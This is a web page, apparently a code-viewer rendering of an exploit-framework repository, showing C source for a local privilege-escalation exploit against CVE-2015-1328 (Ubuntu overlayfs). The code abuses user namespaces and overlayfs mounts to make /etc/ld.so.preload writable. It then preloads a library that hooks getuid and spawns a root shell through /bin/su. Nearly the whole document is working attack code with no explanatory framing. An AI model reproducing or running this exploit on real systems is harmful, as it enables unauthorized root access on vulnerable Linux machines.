Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/external/source/exploits/CVE-2015-1328/1328.c
Views: 11780
#include <stdio.h>1#include <stdlib.h>2#include <unistd.h>3#include <sched.h>4#include <sys/stat.h>5#include <sys/types.h>6#include <sys/mount.h>7#include <signal.h>8#include <fcntl.h>9#include <string.h>10#include <linux/sched.h>1112#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"1314static char child_stack[1024*1024];1516static int17child_exec(void *stuff)18{19char *file;20system("rm -rf /tmp/ns_sploit");21mkdir("/tmp/ns_sploit", 0777);22mkdir("/tmp/ns_sploit/work", 0777);23mkdir("/tmp/ns_sploit/upper",0777);24mkdir("/tmp/ns_sploit/o",0777);2526fprintf(stderr,"mount #1\n");27if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {28// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower29if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {30fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");31exit(-1);32}33file = ".access";34chmod("/tmp/ns_sploit/work/work",0777);35} else file = "ns_last_pid";3637chdir("/tmp/ns_sploit/o");38rename(file,"ld.so.preload");3940chdir("/");41umount("/tmp/ns_sploit/o");42fprintf(stderr,"mount #2\n");43if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {44if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {45exit(-1);46}47chmod("/tmp/ns_sploit/work/work",0777);48}4950chmod("/tmp/ns_sploit/o/ld.so.preload",0777);51umount("/tmp/ns_sploit/o");52}5354int55main(int argc, char **argv)56{57int status, fd, lib;58pid_t wrapper, init;59int clone_flags = CLONE_NEWNS | SIGCHLD;6061fprintf(stderr,"spawning threads\n");6263if((wrapper = fork()) == 0) {64if(unshare(CLONE_NEWUSER) != 0)65fprintf(stderr, "failed to create new user namespace\n");6667if((init = fork()) == 0) {68pid_t pid =69clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);70if(pid < 0) {71fprintf(stderr, "failed to create new mount namespace\n");72exit(-1);73}7475waitpid(pid, &status, 0);7677}7879waitpid(init, &status, 0);80return 0;81}8283usleep(300000);8485wait(NULL);8687fprintf(stderr,"child threads done\n");8889fd = open("/etc/ld.so.preload",O_WRONLY);9091if(fd == -1) {92fprintf(stderr,"exploit failed\n");93exit(-1);94}9596fprintf(stderr,"/etc/ld.so.preload created\n");97/*98fprintf(stderr,"creating shared library\n");99lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);100write(lib,LIB,strlen(LIB));101close(lib);102lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");103if(lib != 0) {104fprintf(stderr,"couldn't create dynamic library\n");105exit(-1);106}*/107write(fd,"/tmp/ofs-lib.so\n",16);108close(fd);109system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");110execl("/bin/su","su",NULL);111}112113114115